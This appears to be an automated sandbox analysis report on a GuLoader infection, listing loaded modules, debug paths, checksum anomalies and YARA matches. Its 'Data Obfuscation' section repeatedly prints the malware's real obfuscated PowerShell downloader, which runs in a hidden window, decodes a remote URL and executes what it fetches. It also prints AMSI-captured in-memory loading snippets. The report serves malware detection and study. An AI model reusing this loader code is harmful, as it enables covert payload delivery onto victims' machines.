              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntvdm64.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdb source: pwahelper.exe.8.dr
              Source: Binary string: GoogleUpdate_unsigned.pdb source: GoogleUpdate.exe.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.8.dr
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: wab.exe, 00000008.00000002.2375969322.0000000006288000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\msoev.pdb source: msoev.exe.8.dr
              Source: Binary string: d:\dbs\el\omr\target\x86\ship\setupexe\x-none\LicLua.pdb source: LICLUA.EXE.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe.8.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1999294674.0000000008915000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.8.dr
              Source: Binary string: MpDlpCmd.pdbGCTL source: MpDlpCmd.exe.8.dr
              Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb source: DW20.EXE.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdbOGP source: ie_to_edge_stub.exe.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\perfboost.pdb source: PerfBoost.exe.8.dr
              Source: Binary string: wab.pdbGCTL source: misc.exe1.8.dr, javacpl.exe.8.dr, MpDlpCmd.exe.8.dr, ie_to_edge_stub.exe.8.dr, DW20.EXE.8.dr, Uninstall.exe.8.dr, java.exe.8.dr, grv_icons.exe.8.dr, SCANPST.EXE.8.dr, SETLANG.EXE.8.dr, notification_click_helper.exe.8.dr, AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, PerfBoost.exe.8.dr, dbcicons.exe.8.dr, GoogleUpdate.exe.8.dr, msoev.exe.8.dr, LICLUA.EXE.8.dr, elevation_service.exe.8.dr, misc.exe0.8.dr, AutoIt3_x64.exe.8.dr, java.exe0.8.dr, accicons.exe.8.dr, MSOICONS.EXE.8.dr, pwahelper.exe.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\msoev.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: msoev.exe.8.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.1992900389.0000000007945000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb source: javacpl.exe.8.dr
              Source: Binary string: wab.pdb source: misc.exe1.8.dr, javacpl.exe.8.dr, MpDlpCmd.exe.8.dr, ie_to_edge_stub.exe.8.dr, DW20.EXE.8.dr, Uninstall.exe.8.dr, java.exe.8.dr, grv_icons.exe.8.dr, SCANPST.EXE.8.dr, SETLANG.EXE.8.dr, notification_click_helper.exe.8.dr, AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, PerfBoost.exe.8.dr, dbcicons.exe.8.dr, GoogleUpdate.exe.8.dr, msoev.exe.8.dr, LICLUA.EXE.8.dr, elevation_service.exe.8.dr, misc.exe0.8.dr, AutoIt3_x64.exe.8.dr, java.exe0.8.dr, accicons.exe.8.dr, MSOICONS.EXE.8.dr, pwahelper.exe.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\scanpst.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SCANPST.EXE.8.dr
              Source: Binary string: d:\dbs\el\omr\target\x86\ship\setupexe\x-none\LicLua.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: LICLUA.EXE.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdbOGP source: pwahelper.exe.8.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb774 source: javacpl.exe.8.dr
              Source: Binary string: MpDlpCmd.pdb source: MpDlpCmd.exe.8.dr
              Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: DW20.EXE.8.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.8.dr, java.exe0.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\perfboost.pdbb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: PerfBoost.exe.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdb source: ie_to_edge_stub.exe.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\setlang.pdb source: SETLANG.EXE.8.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb@g source: powershell.exe, 00000005.00000002.1999294674.0000000008915000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\scanpst.pdb source: SCANPST.EXE.8.dr
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\setlang.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SETLANG.EXE.8.dr

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000005.00000002.2002398118.000000000ACBC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2001822967.0000000008D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1989436125.000000000625A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Bilfragter)$global:Tilsikring = [System.Text.Encoding]::ASCII.GetString($Svedekurene)$global:Owertaen=$Tilsikring.substring($Erstatningsfri,$Capanne)<#Sandpaper Kontrollinie Skjoldbr
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Pegefingeren $Revets $Systemrelation), (Stimuleret @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Svingtud = [AppDomain]::CurrentDomain.GetAssemblies()$gl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Gaslighting)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Heliophobic, $false).DefineType($unadopted, $
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Bilfragter)$global:Tilsikring = [System.Text.Encoding]::ASCII.GetString($Svedekurene)$global:Owertaen=$Tilsikring.substring($Erstatningsfri,$Capanne)<#Sandpaper Kontrollinie Skjoldbr
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHy
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOr
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHyJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrJump to behavior
              Source: AppVDllSurrogate.exe.8.drStatic PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
              Source: MpCmdRun.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x19b52e
              Source: SQLDumper.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x49b60
              Source: AdobeARMHelper.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x64c50
              Source: pj11icon.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x142395
              Source: Aut2exe_x64.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x1c7652
              Source: AppSharingHookController64.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x20765
              Source: GoogleUpdateCore.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x47eca
              Source: NisSrv.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x307019
              Source: AppVDllSurrogate.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x3d892
              Source: pptico.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x3f5707
              Source: visicon.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x2df46c
              Source: dbcicons.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x2bad0
              Source: AppVDllSurrogate64.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x4ec22
              Source: UcMapi.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x132706
              Source: osmclienticon.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x2584f
              Source: outicon.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x91610
              Source: msoev.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x268d3
              Source: mpextms.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0xee9bf
              Source: lyncicon.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0xea647
              Source: jaureg.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x95cbf
              Source: GoogleUpdate.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x36547
              Source: OfficeScrSanBroker.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0xc392a
              Source: javaw.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x5043b
              Source: OfficeScrBroker.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0xa8883
              Source: MsMpEng.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x39d03
              Source: pubs.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x1452a5
              Source: Au3Info.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x3d6d8
              Source: aimgr.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x3b0de
              Source: GoogleUpdateBroker.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x2e9ce
              Source: ai.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0xc328b
              Source: Au3Info_x64.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x49bdd
              Source: PerfBoost.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x6ed59
              Source: javaws.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x6c99c
              Source: MpCmdRun.exe0.8.drStatic PE information: real checksum: 0x8a074 should be: 0x146cda
              Source: aimgr.exe0.8.drStatic PE information: real checksum: 0x8a074 should be: 0x2e51b
              Source: Common.DBConnection.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x2153c
              Source: GoogleUpdateOnDemand.exe.8.drStatic PE information: real checksum: 0x8a074 should be: 0x2e8fe
